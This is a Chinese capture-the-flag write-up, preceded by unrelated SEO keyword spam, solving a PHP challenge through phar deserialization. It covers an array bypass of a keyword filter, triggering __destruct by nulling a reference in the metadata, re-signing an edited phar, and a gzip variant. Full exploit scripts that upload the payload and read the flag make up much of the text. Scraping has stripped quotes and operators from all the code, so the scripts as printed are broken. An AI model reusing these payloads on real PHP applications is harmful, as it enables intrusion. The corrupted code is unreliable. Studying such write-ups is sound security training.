上海简约网站建设公司,建设网站域名,自己设计logo的网站,黑龙江建设网一体化平台文章目录 解题过程代码审计思路问题解决数组绕过preg_match__destruct的触发修改phar文件以及签名phar://支持的后缀 题解方法一#xff08;数组绕过#xff09;方法二#xff08;gzip绕过#xff09; 解题过程
源代码 META http-equivContent-Type conte… 文章目录 解题过程代码审计思路问题解决数组绕过preg_match__destruct的触发修改phar文件以及签名phar://支持的后缀 题解方法一数组绕过方法二gzip绕过 解题过程
源代码 META http-equivContent-Type contenttext/html; charsetutf-8 /
?php
highlight_file(__FILE__);
class getflag {function __destruct() {echo getenv(FLAG);}
}class A {public $config;function __destruct() {if ($this-config w) {$data $_POST[0];if (preg_match(/get|flag|post|php|filter|base64|rot13|read|data/i, $data)) {die(我知道你想干吗我的建议是不要那样做。);}file_put_contents(./tmp/a.txt, $data);} else if ($this-config r) {$data $_POST[0];if (preg_match(/get|flag|post|php|filter|base64|rot13|read|data/i, $data)) {die(我知道你想干吗我的建议是不要那样做。);}echo file_get_contents($data);}}
}
if (preg_match(/get|flag|post|php|filter|base64|rot13|read|data/i, $_GET[0])) {die(我知道你想干吗我的建议是不要那样做。);
}
unserialize($_GET[0]);
throw new Error(那么就从这里开始起航吧);代码审计
首先有getflag类内容就是输出$FLAG触发条件为__destruct然后就是A类的文件写入和读取。最后就是对GET[0]的关键字判断通过后反序列化GET[0]。
思路
这里因为关键字对flag有过滤所以无法直接触发getflag类转眼去看A类既然有任意内容写入任意文件读取类优先考虑phar反序列化
那我们的操作就是先利用A类的写文件功能写入一个phar文件其中phar文件的metadata部分设置为getflag类这样phar://读取之后其中的metadata部分的数据就被反序列化getflag就生成了再最后程序结束触发__destruct获取flag
问题解决
数组绕过preg_match
如果我们要绕过preg_match我们可以采用数组绕过的方法 我们本地测试下源码如下
?php
$data array(0by_pass:iwantflag,1123456);
if (preg_match(/flag/i, $data)) {die(我知道你想干吗我的建议是不要那样做。);
}
else{echo success bypass;file_put_contents(./win.txt, $data);
}小皮跑一下发现成功写入
但是这里也同时出现了报错信息我们看到题目源代码最下面
throw new Error(那么就从这里开始起航吧);这样的话会抛出错误运行中止那么我们就无法触发__destruct方法
__destruct的触发
然后就来到第二个点如何绕过抛出异常去触发呢 在PHP中正常触发析构函数(__destruct)有三种方法
①程序正常结束 ②主动调用unset($aa) ③将原先指向类的变量取消对类的引用即$aa 其他值;
这题我们采用第三种方法 PHP中的垃圾回收Garbagecollection机制利用引用计数和回收周期自动管理内存对象。当一个对象没有被引用时PHP就会将其视为“垃圾”这个”垃圾“会被回收回收过程中就会触发析构函数 所以我们可以利用取消原本对getflag的引用从而触发他的析构函数。
操作如下在phar的metadata中写入的内容为a:2:{i:0;O:7:getflag:0:{}i:0;N;} 这样的话当phar://反序列化其中的数据时反序列化时是按顺序执行的先反出a[0]的数据也就是a[0]getflag类再接着反序列化时又将a[0]设为了NULL那就和上述所说的一致了getflag类被取消了引用所以会触发他的析构函数从而获得flag
但是我们生成的phar文件生成的字符串是a:2:{i:0;O:7:getflag:0:{}i:1;N;}不是我们想要的字符串那么需要解决的第三个问题
修改phar文件以及签名
步骤如下 我们先在010打开此phar文件然后复制内容 再新建一个十六进制文本粘贴进去并且将1改为0 phar文件是修改成功了但这个时候这个phar是处于损坏状态的因为我们修改了前面的数据导致后面的签名对不上。这个时候我们还需要手动计算出这个新phar文件的签名查看PHP手册找到phar的签名格式
我们刚刚的phar的签名标志位为0x0003为SHA256签名所以我们要计算的是出的字节是[-40:-8]用脚本计算我们新的phar文件的签名并重新写入文件也可以导出为新文件
除了数组绕过的思路外还有如下方法
phar://支持的后缀
除了.phar可以用phar://读取gzip bzip2 tar zip 这四个后缀同样也支持phar://读取 所以在此题中可以对hacker1.phar文件做以上这些处理使其成为乱码从而绕过关键字的检测
题解
方法一数组绕过
生成phar文件脚本
?php
class getflag{
}
$a new getflag();
$a array(0$a,1null);
$phar new Phar(hacker.phar);
$phar-startBuffering();
$phar-setStub(?php __HALT_COMPILER(); ?);
$phar-setMetadata($a);
$phar-addFromString(test.txt, test);
$phar-stopBuffering();
?然后010打开把1改为0 然后修改签名脚本如下
from hashlib import sha256
with open(hacker1.phar,rb) as f:textf.read()maintext[:-40] #正文部分(除去最后40字节)endtext[-8:] #最后八位也是不变的 new_signsha256(main).digest()new_pharmainnew_signendopen(hacker1.phar,wb).write(new_phar) #将新生成的内容以二进制方式覆盖写入原来的phar文件然后上传脚本
import requests
import reurlhttp://node4.anna.nssctf.cn:28853/### 写入phar文件
with open(hacker1.phar,rb) as f:data1{0[]:f.read()} #传数组绕过值就是hacker1.phar文件的内容param1 {0: O:1:A:1:{s:6:config;s:1:w;}}res1 requests.post(urlurl, paramsparam1,datadata1)### 读phar文件获取flag
param2{0:O:1:A:1:{s:6:config;s:1:r;}}
data2{0:phar://tmp/a.txt}
res2requests.post(urlurl,paramsparam2,datadata2)
flagre.compile(NSSCTF\{.*?\}).findall(res2.text)
print(flag)然后就得到flag
方法二gzip绕过
直接用脚本进行gzip压缩并完成后续一系列操作 脚本如下
import requests
import re
import gzipurlhttp://node4.anna.nssctf.cn:28853/### 先将phar文件变成gzip文件
with open(hacker1.phar,rb) as f1:phar_zipgzip.open(gzip.zip,wb) #创建了一个gzip文件的对象phar_zip.writelines(f1) #将phar文件的二进制流写入phar_zip.close()###写入gzip文件
with open(gzip.zip,rb) as f2:data1{0:f2.read()} #利用gzip后全是乱码绕过 param1 {0: O:1:A:1:{s:6:config;s:1:w;}}p1 requests.post(urlurl, paramsparam1,datadata1)### 读gzip.zip文件获取flag
param2{0:O:1:A:1:{s:6:config;s:1:r;}}
data2{0:phar://tmp/a.txt}
p2requests.post(urlurl,paramsparam2,datadata2)
flagre.compile(NSSCTF\{.*?\}).findall(p2.text)
print(flag)也同样可以得到flag
